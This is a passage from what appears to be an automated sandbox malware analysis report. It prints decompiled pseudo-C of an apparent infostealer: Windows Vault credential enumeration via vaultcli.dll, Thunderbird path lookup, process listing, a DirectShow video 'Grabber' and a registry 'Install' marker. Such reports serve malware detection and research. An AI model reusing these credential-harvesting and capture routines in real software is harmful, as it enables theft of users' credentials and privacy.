				_t33 = __ecx;
				E00251052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}









                                      0x0025add2
                                      0x0025addc
                                      0x0025ade2
                                      0x0025ade4
                                      0x0025ade6
                                      0x0025adfa
                                      0x0025ae08
                                      0x0025ae29
                                      0x00000000
                                      0x0025ae51
                                      0x0025ae3e
                                      0x0025ae47
                                      0x00000000

                                      APIs
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0025ADFA
                                      • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0025AE08
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,002593CF,?,00000104,00000000), ref: 0025AE21
                                      • RegQueryValueExW.ADVAPI32(002593CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0025AE3E
                                      • RegCloseKey.ADVAPI32(002593CF,?,00000104,00000000), ref: 0025AE47
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0025ADF4
                                      • thunderbird.exe, xrefs: 0025AE00
                                      • Path, xrefs: 0025AE36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                      • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                      • API String ID: 3135247354-1374996286
                                      • Opcode ID: 1f9a77826ae03f9503e457a41fa75bdf335a1a95bb3b9cb4594d013c59c85a23
                                      • Instruction ID: 121ed20fe7e4a6de4a33f917bd7f4cf1bbe46e34fba3ff93c1dd740018302572
                                      • Opcode Fuzzy Hash: 1f9a77826ae03f9503e457a41fa75bdf335a1a95bb3b9cb4594d013c59c85a23
                                      • Instruction Fuzzy Hash: 31112E72A4011DFFD7109B94ED4EFEA77BCDB14745F004065BA09E2050E6B09E588B61
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00260500, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 175comCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E00260500(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v128;
				char _v144;
				intOrPtr _v148;
				char _v216;
				intOrPtr* _t63;
				intOrPtr* _t76;
				intOrPtr* _t80;
				signed int _t82;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t103;
				intOrPtr* _t115;
				intOrPtr* _t118;
				void* _t121;

				_v28 = __ecx;
				__imp__CoInitialize(0);
				_v12 = 0;
				_v16 = 0;
				_t118 = 0;
				_v20 = 0;
				_t89 = 0;
				_v24 = 0;
				_t115 = __imp__CoCreateInstance;
				_t63 =  *_t115(0x262560, 0, 1, 0x264854,  &_v24);
				_t91 = _v24;
				if(_t91 == 0) {
					L8:
					_t92 = _v12;
					if(_t92 != 0) {
						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
						_v12 = _v12 & 0x00000000;
					}
					L10:
					_t93 = _v16;
					if(_t93 != 0) {
						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
						_v16 = _v16 & 0x00000000;
					}
					_t94 = _v20;
					if(_t94 != 0) {
						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
						_v20 = _v20 & 0x00000000;
					}
					_t95 = _v24;
					if(_t95 != 0) {
						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
						_v24 = _v24 & 0x00000000;
					}
					if(_t118 != 0) {
						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
					}
					if(_t89 != 0) {
						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
					}
					__imp__CoUninitialize();
					return _t63;
				}
				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x262540,  &_v16);
				_t96 = _v16;
				if(_t96 == 0) {
					goto L8;
				}
				 *((intOrPtr*)( *_t96 + 4))(_t96);
				_t63 = E00260831(_a4,  &_v12);
				if(_v12 == 0) {
					goto L10;
				}
				_t63 =  *_t115(0x2625b0, 0, 1, 0x264844,  &_v20);
				_t98 = _v20;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
					_t76 = _v20;
					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
					E00251052( &_v144, 0, 0x48);
					_t80 = _v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
					_t63 = E0026044E();
					_t118 = _t63;
					if(_t118 != 0) {
						_t63 = E0026046A();
						_t89 = _t63;
						if(_t89 != 0) {
							_t103 = _v20;
							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
							if(_t63 >= 0) {
								_t82 = _v24;
								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
								_t105 = _v148;
								_t113 = _v148 + 0x30;
								E0025102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
								E002602B1( &_v216);
								_t63 = E002608F0(_v28, _t113, _a4, _v64, _v68, _v58);
							}
						}
					}
				}
				goto L8;
			}































                                      0x0026050e
                                      0x00260512
                                      0x0026051b
                                      0x00260527
                                      0x0026052a
                                      0x0026052c
                                      0x0026052f
                                      0x00260531
                                      0x00260534
                                      0x0026053f
                                      0x00260541
                                      0x00260546
                                      0x00260670
                                      0x00260670
                                      0x00260675
                                      0x0026067a
                                      0x0026067d
                                      0x0026067d
                                      0x00260681
                                      0x00260681
                                      0x00260686
                                      0x0026068b
                                      0x0026068e
                                      0x0026068e
                                      0x00260692
                                      0x00260697
                                      0x0026069c
                                      0x0026069f
                                      0x0026069f
                                      0x002606a3
                                      0x002606a8
                                      0x002606ad
                                      0x002606b0
                                      0x002606b0
                                      0x002606b6
                                      0x002606bb
                                      0x002606bb
                                      0x002606c0
                                      0x002606c5
                                      0x002606c5
                                      0x002606c8
                                      0x002606d2
                                      0x002606d2
                                      0x00260558
                                      0x0026055a
                                      0x0026055f
                                      0x00000000
                                      0x00000000
                                      0x00260568
                                      0x00260571
                                      0x00260579
                                      0x00000000
                                      0x00000000
                                      0x00260590
                                      0x00260592
                                      0x00260597
                                      0x002605a8
                                      0x002605ab
                                      0x002605b9
                                      0x002605c6
                                      0x002605d0
                                      0x002605e2
                                      0x002605e5
                                      0x002605e6
                                      0x002605e7
                                      0x002605f0
                                      0x002605f1
                                      0x002605f2
                                      0x002605f3
                                      0x002605f6
                                      0x002605fc
                                      0x00260601
                                      0x00260605
                                      0x0026060a
                                      0x0026060f
                                      0x00260613
                                      0x00260615
                                      0x0026061d
                                      0x00260622
                                      0x00260624
                                      0x00260631
                                      0x00260634
                                      0x0026063c
                                      0x00260649
                                      0x00260657
                                      0x0026066b
                                      0x0026066b
                                      0x00260622
                                      0x00260613
                                      0x00260605
                                      0x00000000

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00260512
                                      • CoCreateInstance.OLE32(00262560,00000000,00000001,00264854,00260041), ref: 0026053F
                                      • CoUninitialize.OLE32 ref: 002606C8
                                        • Part of subcall function 00260831: CoCreateInstance.OLE32(002625A0,00000000,00000001,00264834,?), ref: 0026085F
                                      • CoCreateInstance.OLE32(002625B0,00000000,00000001,00264844,?), ref: 00260590
                                        • Part of subcall function 002602B1: CoTaskMemFree.OLE32(?), ref: 002602BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 533512943-4200688928
                                      • Opcode ID: 76fa4776a99f7bc113a0ec7360dde162a7cc20ed8aeed5ff18090e4fa5d77938
                                      • Instruction ID: ea35fda9e57289d5a719f65d060e2c00bfb5febdd2753526feb2a7ce33b69797
                                      • Opcode Fuzzy Hash: 76fa4776a99f7bc113a0ec7360dde162a7cc20ed8aeed5ff18090e4fa5d77938
                                      • Instruction Fuzzy Hash: F5514D71A10209AFDB14DFA4C894EAFB7B9EF85701F144459F505AB260CBB1ADA4CF60
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025A1FF, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54libraryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E0025A1FF(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx;
				_t17 = LoadLibraryA("vaultcli.dll");
				 *(_t45 + 0xc0) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
					 *((intOrPtr*)(_t45 + 0x8c)) = E0025E907(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x90)) = E0025E907( *(_t45 + 0xc0), "VaultCloseVault", _t46);
					_t21 = E0025E907( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
					 *((intOrPtr*)(_t45 + 0x98)) = E0025E907( *(_t45 + 0xc0), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x9c)) = E0025E907( *(_t45 + 0xc0), _t43, _t46);
					_t24 = E0025E907( *(_t45 + 0xc0), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}








                                      0x0025a1ff
                                      0x0025a205
                                      0x0025a207
                                      0x0025a20d
                                      0x0025a213
                                      0x0025a215
                                      0x0025a2c9
                                      0x0025a2c9
                                      0x0025a2cc
                                      0x0025a21b
                                      0x0025a21c
                                      0x0025a234
                                      0x0025a24a
                                      0x0025a250
                                      0x0025a25b
                                      0x0025a262
                                      0x0025a275
                                      0x0025a28b
                                      0x0025a291
                                      0x0025a299
                                      0x0025a2a6
                                      0x00000000
                                      0x0025a2c4
                                      0x0025a2c8
                                      0x0025a2c8
                                      0x0025a2a6

                                      APIs
                                      • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0025A207
                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadlstrcmp
                                      • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                      • API String ID: 2493137890-3967309459
                                      • Opcode ID: 6a7988999802bb2f7861f6df104deaf9c44d16e841cf6a88b9448baaa620154e
                                      • Instruction ID: 9288e6db44e14815c231c88ba873186bc63710cfbb18282e72f90d9eeefd6f5c
                                      • Opcode Fuzzy Hash: 6a7988999802bb2f7861f6df104deaf9c44d16e841cf6a88b9448baaa620154e
                                      • Instruction Fuzzy Hash: AD114635A21B41CBDF68AF30981AB6376E1AF41316F01493EDCAEC7745DA30A869CB54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025F7D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registrystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025F7D0(void* __ecx) {
				void* _v8;
				int _v12;
				short* _t16;

				_t16 = L"SOFTWARE\\_rptls";
				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
				}
				RegSetValueExW(_v8, L"Install", 0, 1, 0x2668a8, lstrlenW(0x2668a8) << 2);
				return RegCloseKey(_v8);
			}






                                      0x0025f7e4
                                      0x0025f7f8
                                      0x0025f80d
                                      0x0025f80d
                                      0x0025f82f
                                      0x0025f842

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,002668A8,?,?,?,?,0025F87F), ref: 0025F7F0
                                      • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0025F87F), ref: 0025F80D
                                      • lstrlenW.KERNEL32(002668A8,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F819
                                      • RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,002668A8,00000000,?,?,?,?,0025F87F,?,?,?,?,0025535D), ref: 0025F82F
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F838
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenValuelstrlen
                                      • String ID: Install$SOFTWARE\_rptls
                                      • API String ID: 2036214137-3226779556
                                      • Opcode ID: 9b78150fbdda6ef34c394a920685918d6715432e45349bbddadaa34f38652a25
                                      • Instruction ID: 8dc6a1b6f995098f378487a443fe61e9a03fa39a6dbea1f5b6e19767c4b3df38
                                      • Opcode Fuzzy Hash: 9b78150fbdda6ef34c394a920685918d6715432e45349bbddadaa34f38652a25
                                      • Instruction Fuzzy Hash: 7FF06D72500118FFEB209B96EC4DEEB7E7CEBD7795F104069FA09E2010D6A15E58D6B0
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00255AF2, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E00255AF2() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t2 != 0) {
					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}




                                      0x00255b03
                                      0x00255b0b
                                      0x00255b1e
                                      0x00255b1e
                                      0x00255b22

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00255AF7
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00255B03
                                      • ExitProcess.KERNEL32 ref: 00255B22
                                      Strings
                                      • PureCall, xrefs: 00255B12
                                      • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 00255B17
                                      • MessageBoxA, xrefs: 00255AFD
                                      • USER32.DLL, xrefs: 00255AF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                      • API String ID: 881411216-4134947204
                                      • Opcode ID: e2a9ff1ba1734ce01df35e919a7f3d084cdeb96317f0bcfa722fcd38617640e5
                                      • Instruction ID: 36495816aa28a10a0378e57fc7e9cba28ad2d7e1a27a47a096877d88444cf88b
                                      • Opcode Fuzzy Hash: e2a9ff1ba1734ce01df35e919a7f3d084cdeb96317f0bcfa722fcd38617640e5
                                      • Instruction Fuzzy Hash: 14D0C730394F11E6D55017A46C1EF1535246706F03F008460F709A50D3C5E090BC4539
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025ECC2, Relevance: 12.2, APIs: 8, Instructions: 164processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E0025ECC2(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				struct tagPROCESSENTRY32W* _t57;
				int _t73;
				int _t77;
				int _t89;
				void* _t91;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t119;
				void* _t120;
				signed int _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t125;

				_t125 = __eflags;
				_t112 = __edx;
				_t91 = __ecx;
				E00251052( &_v600, 0, 0x228);
				_t124 = _t123 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				E00251683( &_v44, _t125);
				_t113 = CreateToolhelp32Snapshot(2, 0);
				if(_t113 == 0xffffffff) {
					L14:
					E002512BA(_t91, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t119 =  *(_t54 - 4);
						_t115 = _t119 * 0xc + _t54;
						__eflags = _t119;
						if(_t119 != 0) {
							do {
								_t115 = _t115 - 0xc;
								E002513B6(_t115);
								_t119 = _t119 - 1;
								__eflags = _t119;
							} while (_t119 != 0);
						}
					}
				} else {
					_t57 =  &_v604;
					Process32FirstW(_t113, _t57);
					_t127 = _t57;
					if(_t57 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E0025312C( &_v12, _t112,  &_v568);
							_t120 = OpenProcess(0x1410, 0, _v596);
							__eflags = _t120 - 0xffffffff;
							if(_t120 == 0xffffffff) {
								E00253264( &_v8, E00253412( &_v28, "-"));
								E00255A2D(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E00251052( &_v1644, 0, 0x410);
								_t124 = _t124 + 0xc;
								_t77 =  &_v1644;
								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
								__eflags = _t77;
								if(_t77 == 0) {
									E00253264( &_v8, E00253412( &_v24, "-"));
									E00255A2D(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E00253264( &_v8, E00253412( &_v20,  &_v1644));
									E00255A2D(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t120);
							}
							_t124 = _t124 - 0xc;
							_t121 = _t124;
							 *_t124 = _v16;
							E0025345A(_t121 + 4,  &_v12);
							E0025345A(_t121 + 8,  &_v8);
							E00251560( &_v44);
							E002513B6( &_v16);
							_t73 = Process32NextW(_t113,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t73;
						} while (__eflags != 0);
						CloseHandle(_t113);
						goto L14;
					} else {
						CloseHandle(_t113);
						E002512BA(_t91, _t127,  &_v44);
						_t89 = _v44;
						if(_t89 != 0) {
							_t122 =  *(_t89 - 4);
							_t117 = _t122 * 0xc + _t89;
							if(_t122 != 0) {
								do {
									_t117 = _t117 - 0xc;
									E002513B6(_t117);
									_t122 = _t122 - 1;
								} while (_t122 != 0);
							}
						}
					}
				}
				return _t91;
			}



































                                      0x0025ecc2
                                      0x0025ecc2
                                      0x0025ecdd
                                      0x0025ecdf
                                      0x0025ece4
                                      0x0025ece7
                                      0x0025ecf4
                                      0x0025ecf9
                                      0x0025ecfa
                                      0x0025ecfd
                                      0x0025ed00
                                      0x0025ed0e
                                      0x0025ed13
                                      0x0025ee9b
                                      0x0025eea1
                                      0x0025eea6
                                      0x0025eea9
                                      0x0025eeab
                                      0x0025eead
                                      0x0025eeb3
                                      0x0025eeb5
                                      0x0025eeb7
                                      0x0025eeb9
                                      0x0025eeb9
                                      0x0025eebe
                                      0x0025eec3
                                      0x0025eec3
                                      0x0025eec3
                                      0x0025eeb9
                                      0x0025eeb7
                                      0x0025ed19
                                      0x0025ed19
                                      0x0025ed21
                                      0x0025ed27
                                      0x0025ed29
                                      0x0025ed6c
                                      0x0025ed75
                                      0x0025ed7f
                                      0x0025ed82
                                      0x0025ed85
                                      0x0025ed9c
                                      0x0025ed9e
                                      0x0025eda1
                                      0x0025ee38
                                      0x0025ee40
                                      0x0025ee45
                                      0x0025ee45
                                      0x0025ee45
                                      0x0025eda7
                                      0x0025edb5
                                      0x0025edba
                                      0x0025edbd
                                      0x0025edcc
                                      0x0025edd2
                                      0x0025edd4
                                      0x0025ee0d
                                      0x0025ee15
                                      0x0025ee1a
                                      0x0025ee1a
                                      0x0025ee1a
                                      0x0025edd6
                                      0x0025ede9
                                      0x0025edf1
                                      0x0025edf6
                                      0x0025edf6
                                      0x0025ee1f
                                      0x0025ee1f
                                      0x0025ee4c
                                      0x0025ee4f
                                      0x0025ee51
                                      0x0025ee5a
                                      0x0025ee66
                                      0x0025ee6e
                                      0x0025ee76
                                      0x0025ee83
                                      0x0025ee89
                                      0x0025ee8b
                                      0x0025ee8c
                                      0x0025ee8c
                                      0x0025ee95
                                      0x00000000
                                      0x0025ed2b
                                      0x0025ed2c
                                      0x0025ed38
                                      0x0025ed3d
                                      0x0025ed42
                                      0x0025ed48
                                      0x0025ed4e
                                      0x0025ed52
                                      0x0025ed58
                                      0x0025ed58
                                      0x0025ed5d
                                      0x0025ed62
                                      0x0025ed62
                                      0x0025ed67
                                      0x0025ed52
                                      0x0025ed42
                                      0x0025ed29
                                      0x0025eece

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0025ED08
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0025ED21
                                      • CloseHandle.KERNEL32(00000000), ref: 0025ED2C
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0025ED96
                                      • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0025EDCC
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EE1F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0025EE83
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EE95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                      • String ID:
                                      • API String ID: 3514491001-0
                                      • Opcode ID: caff6ca00bf566ff5a10f7ff99f8e603ce8bcd1b0e690bbf2d8789fb3545bf94
                                      • Instruction ID: b2438ac27c3da15173a1f79d2ebe00bd228e953afc420d851bdd21a92cd5115f
                                      • Opcode Fuzzy Hash: caff6ca00bf566ff5a10f7ff99f8e603ce8bcd1b0e690bbf2d8789fb3545bf94
                                      • Instruction Fuzzy Hash: E451B372D20519ABCB14EBA0DD4AAEEB778AF44712F0101A5EC05B3191DB709F6DCF98
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 00260AD0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 55%
                                      			E00260AD0(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t1 = _t76 + 0x18; // 0x3c0a70
				_t111 = _t1;
				__imp__CoCreateInstance(0x262560, 0, 1, 0x264854, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t2 = _t76 + 0x1c; // 0x3c0a74
					_t104 = _t2;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x262540, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t4 = _t76 + 0x20; // 0x3c0a78
						_t112 = _t4;
						if(_t112 != 0) {
							_t49 = E00260831(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t6 = _t76 + 0x24; // 0x3c0a7c
							_t113 = _t6;
							__imp__CoCreateInstance(0x2625b0, 0, 1, 0x264844, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								_t7 = _t76 + 0x20; // 0x0
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *_t7, L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E00251052( &_v128, 0, 0x48);
								_t11 = _t76 + 0x18; // 0x0
								_t58 =  *_t11;
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = E0026044E();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = E0026046A();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t20 = _t76 + 0x24; // 0x0
										_t85 =  *_t20;
